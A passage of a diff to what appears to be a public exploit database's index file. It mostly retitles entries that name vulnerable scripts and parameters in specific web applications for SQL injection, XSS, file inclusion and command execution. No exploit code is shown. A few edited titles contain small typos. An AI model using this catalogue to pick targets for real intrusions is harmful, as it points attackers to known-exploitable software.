29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0 -29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - edittag.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - edittag.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 - edittag_mp.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 - edittag_mp.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 - mkpw_mp.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 - mkpw.pl plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 - mkpw.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 @@ -30976,7 +30987,7 @@ id,file,description,date,author,platform,type,port 29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 - register.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 - power_search.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - 'new.php' Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - 'mailing_list.php' Multiple Parameters Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 @@ -31016,7 +31027,7 @@ id,file,description,date,author,platform,type,port 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 -29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php objectId Parameter' SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 +29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php' 'objectId' Parameter SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 @@ -31146,8 +31157,8 @@ id,file,description,date,author,platform,type,port 29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php' nid Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - 'wp-includes/theme.php' iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection",2007-02-26,CorryL,php,webapps,0 +29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - 'wp-includes/theme.php' 'iz' Parameter Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Parameter SQL Injection",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 @@ -31194,13 +31205,13 @@ id,file,description,date,author,platform,type,port 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 29782,platforms/php/webapps/29782.txt,"Satel Lite - Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 -29786,platforms/php/webapps/29786.txt,"aBitWhizzy - whizzylink.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 +29786,platforms/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 30105,platforms/php/webapps/30105.txt,"WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 30157,platforms/php/webapps/30157.txt,"Joomla! Component JD-Wiki 1.0.2 - dwpage.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30158,platforms/php/webapps/30158.txt,"Joomla! Component JD-Wiki 1.0.2 - wantedpages.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - search.php Cross-Site Scripting",2007-05-30,Serapis.net,php,webapps,0 -30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x - 'index.php' Multiple SQL Injection",2007-05-31,ls@calima.serapis.net,php,webapps,0 +30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x - 'index.php' Multiple SQL Injections",2007-05-31,ls@calima.serapis.net,php,webapps,0 30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 - (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 - (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/Authenticate.php sUName Parameter Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 @@ -31223,7 +31234,7 @@ id,file,description,date,author,platform,type,port 30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 - chat.php sid Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 - help.php Multiple Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - admin/header.php admin[name] Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - super/info.php BASE_URL Variable Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - 'super/info.php' 'BASE_URL' Parameter Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - setup/footer.php Multiple Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 - 'index.php' Cross-Site Scripting",2007-06-02,vagrant,php,webapps,0 30140,platforms/php/webapps/30140.txt,"Okyanusmedya - 'index.php' Cross-Site Scripting",2007-06-04,vagrant,php,webapps,0 @@ -31239,7 +31250,7 @@ id,file,description,date,author,platform,type,port 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - Okul Portal Haber_Oku.asp SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - 'Request_URI' Parameter Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - vBSupport.php SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 -30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 +30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - 'auth.php' Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter Cross-Site Scripting",2007-06-11,"Tim Brown",php,webapps,0 30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 - admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 - admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 @@ -31267,8 +31278,8 @@ id,file,description,date,author,platform,type,port 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps,0 -29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 -29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 +29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php' 'post_id' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 +29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php' 'tool_url' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 @@ -31286,12 +31297,12 @@ id,file,description,date,author,platform,type,port 29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 - Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 -29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection",2007-04-17,Aleksandar,php,webapps,0 +29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections",2007-04-17,Aleksandar,php,webapps,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 -29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 +29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - Turbulence.php Remote File Inclusion",2007-04-20,Omni,php,webapps,0 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 - You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 @@ -31305,7 +31316,7 @@ id,file,description,date,author,platform,type,port 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - admin.php modsettings Module smiley_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 -29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - admin.php module[] Variable Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 +29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php' 'module[]' Parameter Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 - include/admin/banlist.php delete Parameter Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 - pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 @@ -31390,8 +31401,8 @@ id,file,description,date,author,platform,type,port 30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php password0 Parameter' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php language Parameter' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 @@ -31414,7 +31425,7 @@ id,file,description,date,author,platform,type,port 30088,platforms/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - 'news.php' SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 -30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Parameters Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 @@ -31425,7 +31436,7 @@ id,file,description,date,author,platform,type,port 30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - AuthError.cfm Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 30217,platforms/php/webapps/30217.txt,"Wrapper.php for osCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps,0 30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 - 'index.php' Local File Inclusion",2007-06-21,r0t,php,webapps,0 -30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 - 'index.php' Multiple SQL Injection",2007-06-21,r0t,php,webapps,0 +30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 - 'index.php' Multiple SQL Injections",2007-06-21,r0t,php,webapps,0 30223,platforms/php/webapps/30223.txt,"NetClassifieds 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",php,webapps,0 30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 - mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 - banners.php click Action bid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 @@ -31446,11 +31457,11 @@ id,file,description,date,author,platform,type,port 30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 - 'index.php' Cross-Site Scripting",2007-07-02,MustLive,php,webapps,0 30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS - Information Disclosure",2007-07-02,durito,php,webapps,0 30263,platforms/cgi/webapps/30263.txt,"Oliver - Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 -30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - /jspui/applicationList.jsp alpha Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - /jspui/appConfig.jsp task Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp' 'alpha' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp' 'task' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 - netflow/jspui/index.jsp view Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - /jspui/selectDevice.jsp rtype Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - /jspui/customReport.jsp rtype Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp' 'rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp' 'rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30271,platforms/java/webapps/30271.txt,"OpManager 6/7 - ping.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 @@ -31487,8 +31498,8 @@ id,file,description,date,author,platform,type,port 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.asp SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 -30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - deletecomment.php id Variable Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - deleteblog.php id Variable Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php' 'id' Parameter Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php' 'id' Parameter Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - install/upgrade-0-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - 'wp-admin/page-new.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 @@ -31557,7 +31568,7 @@ id,file,description,date,author,platform,type,port 30448,platforms/php/webapps/30448.txt,"Lanius CMS 1.2.14 FAQ Module - 'mid' Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30449,platforms/php/webapps/30449.txt,"Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30450,platforms/php/webapps/30450.txt,"Lanius CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 -30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager - default.asp Multiple SQL Injection",2007-08-03,"Aria-Security Team",asp,webapps,0 +30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections",2007-08-03,"Aria-Security Team",asp,webapps,0 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 30456,platforms/php/webapps/30456.txt,"VietPHP - _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 @@ -31597,8 +31608,8 @@ id,file,description,date,author,platform,type,port 30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,php,webapps,0 30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events - Viewevent.php SQL Injection",2007-08-27,s0cratex,php,webapps,0 30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0 -30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injection",2007-08-28,SmOk3,php,webapps,0 -30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 +30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injections",2007-08-28,SmOk3,php,webapps,0 +30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps,0 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 @@ -31664,8 +31675,8 @@ id,file,description,date,author,platform,type,port 30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Parameter Local File Inclusion",2007-09-17,L4teral,php,webapps,0 30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - hilfe.php Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - RC Parameter Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 -30598,platforms/cgi/webapps/30598.txt,"WebBatch - webbatch.exe URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0 -30599,platforms/cgi/webapps/30599.txt,"WebBatch - webbatch.exe dumpinputdata Variable Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 +30598,platforms/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0 +30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe' 'dumpinputdata' Parameter Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple 